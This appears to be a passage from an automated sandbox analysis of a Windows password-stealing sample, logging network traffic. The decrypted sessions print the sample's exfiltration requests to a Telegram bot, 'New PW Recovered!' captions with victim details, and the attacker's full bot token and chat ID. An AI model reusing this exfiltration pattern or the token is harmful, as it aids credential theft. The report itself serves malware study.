                                                                                      Mar 20, 2023 18:32:24.586592913 CET49696443192.168.2.464.185.227.155
                                                                                      Mar 20, 2023 18:32:24.586646080 CET4434969664.185.227.155192.168.2.4
                                                                                      Mar 20, 2023 18:32:24.586761951 CET49696443192.168.2.464.185.227.155
                                                                                      Mar 20, 2023 18:32:24.623629093 CET49696443192.168.2.464.185.227.155
                                                                                      Mar 20, 2023 18:32:24.623670101 CET4434969664.185.227.155192.168.2.4
                                                                                      Mar 20, 2023 18:32:25.091773033 CET4434969664.185.227.155192.168.2.4
                                                                                      Mar 20, 2023 18:32:25.091881990 CET49696443192.168.2.464.185.227.155
                                                                                      Mar 20, 2023 18:32:25.099304914 CET49696443192.168.2.464.185.227.155
                                                                                      Mar 20, 2023 18:32:25.099378109 CET4434969664.185.227.155192.168.2.4
                                                                                      Mar 20, 2023 18:32:25.100016117 CET4434969664.185.227.155192.168.2.4
                                                                                      Mar 20, 2023 18:32:25.231842041 CET49696443192.168.2.464.185.227.155
                                                                                      Mar 20, 2023 18:32:25.326313019 CET49696443192.168.2.464.185.227.155
                                                                                      Mar 20, 2023 18:32:25.326375008 CET4434969664.185.227.155192.168.2.4
                                                                                      Mar 20, 2023 18:32:25.446140051 CET4434969664.185.227.155192.168.2.4
                                                                                      Mar 20, 2023 18:32:25.456480026 CET4434969664.185.227.155192.168.2.4
                                                                                      Mar 20, 2023 18:32:25.457225084 CET49696443192.168.2.464.185.227.155
                                                                                      Mar 20, 2023 18:32:25.458198071 CET49696443192.168.2.464.185.227.155
                                                                                      Mar 20, 2023 18:32:31.124561071 CET49697443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:32:31.124613047 CET44349697149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:32:31.124871969 CET49697443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:32:31.126873970 CET49697443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:32:31.126895905 CET44349697149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:32:31.200465918 CET44349697149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:32:31.200575113 CET49697443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:32:31.220474005 CET49697443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:32:31.220511913 CET44349697149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:32:31.221143007 CET44349697149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:32:31.291834116 CET49697443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:32:31.291891098 CET44349697149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:32:31.320727110 CET44349697149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:32:31.325416088 CET49697443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:32:31.325442076 CET44349697149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:32:31.474632025 CET44349697149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:32:31.474781990 CET44349697149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:32:31.475228071 CET49697443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:32:31.484395027 CET49697443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:33:25.135878086 CET49698443192.168.2.4173.231.16.76
                                                                                      Mar 20, 2023 18:33:25.135925055 CET44349698173.231.16.76192.168.2.4
                                                                                      Mar 20, 2023 18:33:25.136147976 CET49698443192.168.2.4173.231.16.76
                                                                                      Mar 20, 2023 18:33:25.157119989 CET49698443192.168.2.4173.231.16.76
                                                                                      Mar 20, 2023 18:33:25.157145023 CET44349698173.231.16.76192.168.2.4
                                                                                      Mar 20, 2023 18:33:25.863107920 CET44349698173.231.16.76192.168.2.4
                                                                                      Mar 20, 2023 18:33:25.863265038 CET49698443192.168.2.4173.231.16.76
                                                                                      Mar 20, 2023 18:33:25.865885973 CET49698443192.168.2.4173.231.16.76
                                                                                      Mar 20, 2023 18:33:25.865912914 CET44349698173.231.16.76192.168.2.4
                                                                                      Mar 20, 2023 18:33:25.866353989 CET44349698173.231.16.76192.168.2.4
                                                                                      Mar 20, 2023 18:33:26.049547911 CET49698443192.168.2.4173.231.16.76
                                                                                      Mar 20, 2023 18:33:26.188822985 CET49698443192.168.2.4173.231.16.76
                                                                                      Mar 20, 2023 18:33:26.188852072 CET44349698173.231.16.76192.168.2.4
                                                                                      Mar 20, 2023 18:33:26.346055031 CET44349698173.231.16.76192.168.2.4
                                                                                      Mar 20, 2023 18:33:26.346255064 CET44349698173.231.16.76192.168.2.4
                                                                                      Mar 20, 2023 18:33:26.346323967 CET49698443192.168.2.4173.231.16.76
                                                                                      Mar 20, 2023 18:33:26.347604990 CET49698443192.168.2.4173.231.16.76
                                                                                      Mar 20, 2023 18:33:55.989125967 CET49700443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:33:55.989182949 CET44349700149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:33:55.989268064 CET49700443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:33:55.989737034 CET49700443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:33:55.989758015 CET44349700149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:33:56.056571007 CET44349700149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:33:56.056674004 CET49700443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:33:56.058507919 CET49700443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:33:56.058527946 CET44349700149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:33:56.059144020 CET44349700149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:33:56.061554909 CET49700443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:33:56.061579943 CET44349700149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:33:56.107008934 CET44349700149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:33:56.107294083 CET49700443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:33:56.107326031 CET44349700149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:33:56.210222006 CET44349700149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:33:56.210357904 CET44349700149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:33:56.210422993 CET49700443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:33:56.210705996 CET49700443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:34:27.099704981 CET49702443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:34:27.099773884 CET44349702149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:34:27.099880934 CET49702443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:34:27.100567102 CET49702443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:34:27.100583076 CET44349702149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:34:27.163845062 CET44349702149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:34:27.163971901 CET49702443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:34:27.166548014 CET49702443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:34:27.166579962 CET44349702149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:34:27.166970015 CET44349702149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:34:27.171504974 CET49702443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:34:27.171519995 CET44349702149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:34:27.216794014 CET44349702149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:34:27.218399048 CET49702443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:34:27.218422890 CET44349702149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:34:27.370958090 CET44349702149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:34:27.371076107 CET44349702149.154.167.220192.168.2.4
                                                                                      Mar 20, 2023 18:34:27.371150017 CET49702443192.168.2.4149.154.167.220
                                                                                      Mar 20, 2023 18:34:27.371618986 CET49702443192.168.2.4149.154.167.220

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Mar 20, 2023 18:32:24.526776075 CET5091153192.168.2.48.8.8.8
                                                                                      Mar 20, 2023 18:32:24.546508074 CET53509118.8.8.8192.168.2.4
                                                                                      Mar 20, 2023 18:32:24.555258989 CET5968353192.168.2.48.8.8.8
                                                                                      Mar 20, 2023 18:32:24.577235937 CET53596838.8.8.8192.168.2.4
                                                                                      Mar 20, 2023 18:32:31.103744984 CET6416753192.168.2.48.8.8.8
                                                                                      Mar 20, 2023 18:32:31.121021986 CET53641678.8.8.8192.168.2.4
                                                                                      Mar 20, 2023 18:33:25.043720007 CET5856553192.168.2.48.8.8.8
                                                                                      Mar 20, 2023 18:33:25.061610937 CET53585658.8.8.8192.168.2.4
                                                                                      Mar 20, 2023 18:33:25.073210001 CET5223953192.168.2.48.8.8.8
                                                                                      Mar 20, 2023 18:33:25.091322899 CET53522398.8.8.8192.168.2.4
                                                                                      Mar 20, 2023 18:33:51.773864031 CET5680753192.168.2.48.8.8.8
                                                                                      Mar 20, 2023 18:33:51.793879986 CET53568078.8.8.8192.168.2.4
                                                                                      Mar 20, 2023 18:33:51.806875944 CET6100753192.168.2.48.8.8.8
                                                                                      Mar 20, 2023 18:33:51.824767113 CET53610078.8.8.8192.168.2.4
                                                                                      Mar 20, 2023 18:33:55.968945980 CET6068653192.168.2.48.8.8.8
                                                                                      Mar 20, 2023 18:33:55.986170053 CET53606868.8.8.8192.168.2.4
                                                                                      Mar 20, 2023 18:34:25.351342916 CET6112453192.168.2.48.8.8.8
                                                                                      Mar 20, 2023 18:34:25.371908903 CET53611248.8.8.8192.168.2.4
                                                                                      Mar 20, 2023 18:34:25.376571894 CET5944453192.168.2.48.8.8.8
                                                                                      Mar 20, 2023 18:34:25.396368980 CET53594448.8.8.8192.168.2.4
                                                                                      Mar 20, 2023 18:34:27.075902939 CET5557053192.168.2.48.8.8.8
                                                                                      Mar 20, 2023 18:34:27.093414068 CET53555708.8.8.8192.168.2.4

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Mar 20, 2023 18:32:24.526776075 CET192.168.2.48.8.8.80xb0ffStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:32:24.555258989 CET192.168.2.48.8.8.80x4804Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:32:31.103744984 CET192.168.2.48.8.8.80x6a9bStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:33:25.043720007 CET192.168.2.48.8.8.80x4f01Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:33:25.073210001 CET192.168.2.48.8.8.80xb96Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:33:51.773864031 CET192.168.2.48.8.8.80xad9bStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:33:51.806875944 CET192.168.2.48.8.8.80x2d72Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:33:55.968945980 CET192.168.2.48.8.8.80x607aStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:34:25.351342916 CET192.168.2.48.8.8.80xc1c3Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:34:25.376571894 CET192.168.2.48.8.8.80xe942Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:34:27.075902939 CET192.168.2.48.8.8.80xed0eStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Mar 20, 2023 18:32:24.546508074 CET8.8.8.8192.168.2.40xb0ffNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                      Mar 20, 2023 18:32:24.546508074 CET8.8.8.8192.168.2.40xb0ffNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:32:24.546508074 CET8.8.8.8192.168.2.40xb0ffNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:32:24.546508074 CET8.8.8.8192.168.2.40xb0ffNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:32:24.577235937 CET8.8.8.8192.168.2.40x4804No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                      Mar 20, 2023 18:32:24.577235937 CET8.8.8.8192.168.2.40x4804No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:32:24.577235937 CET8.8.8.8192.168.2.40x4804No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:32:24.577235937 CET8.8.8.8192.168.2.40x4804No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:32:31.121021986 CET8.8.8.8192.168.2.40x6a9bNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:33:25.061610937 CET8.8.8.8192.168.2.40x4f01No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                      Mar 20, 2023 18:33:25.061610937 CET8.8.8.8192.168.2.40x4f01No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:33:25.061610937 CET8.8.8.8192.168.2.40x4f01No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:33:25.061610937 CET8.8.8.8192.168.2.40x4f01No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:33:25.091322899 CET8.8.8.8192.168.2.40xb96No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                      Mar 20, 2023 18:33:25.091322899 CET8.8.8.8192.168.2.40xb96No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:33:25.091322899 CET8.8.8.8192.168.2.40xb96No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:33:25.091322899 CET8.8.8.8192.168.2.40xb96No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:33:51.793879986 CET8.8.8.8192.168.2.40xad9bNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                      Mar 20, 2023 18:33:51.793879986 CET8.8.8.8192.168.2.40xad9bNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:33:51.793879986 CET8.8.8.8192.168.2.40xad9bNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:33:51.793879986 CET8.8.8.8192.168.2.40xad9bNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:33:51.824767113 CET8.8.8.8192.168.2.40x2d72No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                      Mar 20, 2023 18:33:51.824767113 CET8.8.8.8192.168.2.40x2d72No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:33:51.824767113 CET8.8.8.8192.168.2.40x2d72No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:33:51.824767113 CET8.8.8.8192.168.2.40x2d72No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:33:55.986170053 CET8.8.8.8192.168.2.40x607aNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:34:25.371908903 CET8.8.8.8192.168.2.40xc1c3No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                      Mar 20, 2023 18:34:25.371908903 CET8.8.8.8192.168.2.40xc1c3No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:34:25.371908903 CET8.8.8.8192.168.2.40xc1c3No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:34:25.371908903 CET8.8.8.8192.168.2.40xc1c3No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:34:25.396368980 CET8.8.8.8192.168.2.40xe942No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                      Mar 20, 2023 18:34:25.396368980 CET8.8.8.8192.168.2.40xe942No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:34:25.396368980 CET8.8.8.8192.168.2.40xe942No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:34:25.396368980 CET8.8.8.8192.168.2.40xe942No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                      Mar 20, 2023 18:34:27.093414068 CET8.8.8.8192.168.2.40xed0eNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • api.ipify.org
                                                                                      • api.telegram.org

                                                                                      HTTPS Proxied Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.44969664.185.227.155443C:\Users\user\Desktop\PSFBGrvmxy.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2023-03-20 17:32:25 UTC0OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                      Host: api.ipify.org
                                                                                      Connection: Keep-Alive
                                                                                      2023-03-20 17:32:25 UTC0INHTTP/1.1 200 OK
                                                                                      Content-Length: 14
                                                                                      Content-Type: text/plain
                                                                                      Date: Mon, 20 Mar 2023 17:32:25 GMT
                                                                                      Vary: Origin
                                                                                      Connection: close
                                                                                      2023-03-20 17:32:25 UTC0INData Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 37 38
                                                                                      Data Ascii: 102.129.143.78


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      1192.168.2.449697149.154.167.220443C:\Users\user\Desktop\PSFBGrvmxy.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2023-03-20 17:32:31 UTC0OUTPOST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8db29b7328c749b
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 972
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      2023-03-20 17:32:31 UTC0INHTTP/1.1 100 Continue
                                                                                      2023-03-20 17:32:31 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 62 37 33 32 38 63 37 34 39 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 31 36 39 33 36 34 37 30 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 62 37 33 32 38 63 37 34 39 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 31 2f 32 30 32 33 20 30 32 3a 35 31 3a 34 30 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8db29b7328c749bContent-Disposition: form-data; name="chat_id"6169364705-----------------------------8db29b7328c749bContent-Disposition: form-data; name="caption"New PW Recovered!Time: 03/21/2023 02:51:40User
                                                                                      2023-03-20 17:32:31 UTC1INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Mon, 20 Mar 2023 17:32:31 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 727
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":281,"from":{"id":5687731944,"is_bot":true,"first_name":"Lightshine","username":"Lightshine_bot"},"chat":{"id":6169364705,"first_name":"99","last_name":"Grams","type":"private"},"date":1679333551,"document":{"file_name":"user-888683 2023-03-21 02-51-40.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBGWQYmK_QiLcWyNIiWqTZsxZityzjAAIoDwACJVnIUIUBJzs9m9p0LwQ","file_unique_id":"AgADKA8AAiVZyFA","file_size":349},"caption":"New PW Recovered!\n\nTime: 03/21/2023 02:51:40\nUser Name: user/888683\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 102.129.143.78","caption_entities":[{"offset":178,"length":14,"type":"url"}]}}


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      2192.168.2.449698173.231.16.76443C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2023-03-20 17:33:26 UTC2OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                      Host: api.ipify.org
                                                                                      Connection: Keep-Alive
                                                                                      2023-03-20 17:33:26 UTC2INHTTP/1.1 200 OK
                                                                                      Content-Length: 14
                                                                                      Content-Type: text/plain
                                                                                      Date: Mon, 20 Mar 2023 17:33:26 GMT
                                                                                      Vary: Origin
                                                                                      Connection: close
                                                                                      2023-03-20 17:33:26 UTC2INData Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 37 38
                                                                                      Data Ascii: 102.129.143.78


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      3192.168.2.449700149.154.167.220443C:\Users\user\Desktop\PSFBGrvmxy.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2023-03-20 17:33:56 UTC2OUTPOST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8db29826727ee57
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 972
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      2023-03-20 17:33:56 UTC3INHTTP/1.1 100 Continue
                                                                                      2023-03-20 17:33:56 UTC3OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 38 32 36 37 32 37 65 65 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 31 36 39 33 36 34 37 30 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 38 32 36 37 32 37 65 65 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 30 2f 32 30 32 33 20 32 30 3a 33 33 3a 34 35 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8db29826727ee57Content-Disposition: form-data; name="chat_id"6169364705-----------------------------8db29826727ee57Content-Disposition: form-data; name="caption"New PW Recovered!Time: 03/20/2023 20:33:45User
                                                                                      2023-03-20 17:33:56 UTC4INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Mon, 20 Mar 2023 17:33:56 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 727
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":283,"from":{"id":5687731944,"is_bot":true,"first_name":"Lightshine","username":"Lightshine_bot"},"chat":{"id":6169364705,"first_name":"99","last_name":"Grams","type":"private"},"date":1679333636,"document":{"file_name":"user-888683 2023-03-20 20-33-45.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBG2QYmQTsLulnnthcrp4zDpbYwYe0AAIrDwACJVnIUMB_Uwiye44ELwQ","file_unique_id":"AgADKw8AAiVZyFA","file_size":349},"caption":"New PW Recovered!\n\nTime: 03/20/2023 20:33:45\nUser Name: user/888683\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 102.129.143.78","caption_entities":[{"offset":178,"length":14,"type":"url"}]}}


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      4192.168.2.449702149.154.167.220443C:\Users\user\Desktop\PSFBGrvmxy.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2023-03-20 17:34:27 UTC5OUTPOST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8db2971bc1af64d
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 972
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      2023-03-20 17:34:27 UTC5INHTTP/1.1 100 Continue
                                                                                      2023-03-20 17:34:27 UTC5OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 37 31 62 63 31 61 66 36 34 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 31 36 39 33 36 34 37 30 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 37 31 62 63 31 61 66 36 34 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 30 2f 32 30 32 33 20 31 38 3a 33 34 3a 32 36 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8db2971bc1af64dContent-Disposition: form-data; name="chat_id"6169364705-----------------------------8db2971bc1af64dContent-Disposition: form-data; name="caption"New PW Recovered!Time: 03/20/2023 18:34:26User
                                                                                      2023-03-20 17:34:27 UTC6INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Mon, 20 Mar 2023 17:34:27 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 727
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
